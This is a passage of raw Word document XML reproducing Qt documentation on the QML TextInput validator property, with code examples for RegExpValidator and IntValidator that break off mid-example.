      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property.</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Column</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spacing</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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text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text</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Which basket?"</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TextInput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focus</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</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validator</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RegExpValidator</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regExp</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w: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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/fruit basket/</w:t>
      </w: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B54AE2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w: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HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B54AE2" w:rsidRPr="00B54AE2" w:rsidRDefault="00B54AE2" w:rsidP="00B54AE2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The regular expression in the snippet will only allow the inputted text to be</w:t>
      </w:r>
      <w:r w:rsidR="00700D31">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fruit basket</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E850B4" w:rsidRPr="00E850B4" w:rsidRDefault="00B54AE2" w:rsidP="00B54AE2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note that QML parses JavaScript regular expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, while </w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt's</w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2283" w:history="1">
        <w:r w:rsidRPr="00E850B4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QRegExp</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class' regular expressions are based on Perl regular expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54AE2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B54AE2" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2284" w:anchor="validator-prop" w:history="1">
        <w:r w:rsidR="00E850B4" w:rsidRPr="000B77C6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qml-qtquick-textinput.html#validator-prop</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="14310" w:type="dxa"/>
        <w:tblBorders>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="EEEEEE"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="14310"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E850B4" w:rsidRPr="00E850B4" w:rsidTr="00E850B4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="75" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E850B4" w:rsidRPr="00E850B4" w:rsidRDefault="00E850B4">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E850B4">
              <w:rPr>
                <w:rStyle w:val="name"/>
                <w:color w:val="404244"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>validator</w:t>
            </w:r>
            <w:r w:rsidRPr="00E850B4">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E850B4">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00E850B4">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E850B4">
              <w:rPr>
                <w:rStyle w:val="type"/>
                <w:color w:val="404244"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>Validator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E850B4" w:rsidRPr="00E850B4" w:rsidRDefault="00E850B4" w:rsidP="00E850B4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Allows you to set a validator on the</w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2285" w:history="1">
        <w:r w:rsidRPr="00E850B4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TextInput</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. When a validator is set the</w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2286" w:history="1">
        <w:r w:rsidRPr="00E850B4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TextInput</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will only accept input which leaves the text property in an acceptable or intermediate state. The accepted signal will only be sent if the text is in an acceptable state when enter is pressed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E850B4" w:rsidRPr="00E850B4" w:rsidRDefault="00E850B4" w:rsidP="00E850B4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700D31">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Currently supported validators</w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> are</w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2287" w:history="1">
        <w:r w:rsidRPr="00E850B4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>IntValidator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2288" w:history="1">
        <w:r w:rsidRPr="00E850B4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>DoubleValidator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2289" w:history="1">
        <w:r w:rsidRPr="00E850B4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>RegExpValidator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. An example of using validators is shown below, which allows input of integers between 11 and 31 into the text input:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E850B4" w:rsidRPr="00E850B4" w:rsidRDefault="00E850B4" w:rsidP="00E850B4">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850B4">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2290" w:history="1">
        <w:r w:rsidRPr="00E850B4">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtQuick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E850B4" w:rsidRPr="00E850B4" w:rsidRDefault="00E850B4" w:rsidP="00E850B4">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850B4">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TextInput</w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E850B4" w:rsidRPr="00E850B4" w:rsidRDefault="00E850B4" w:rsidP="00E850B4">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850B4">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    validator</w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IntValidator</w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bottom</w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> top</w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E850B4">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
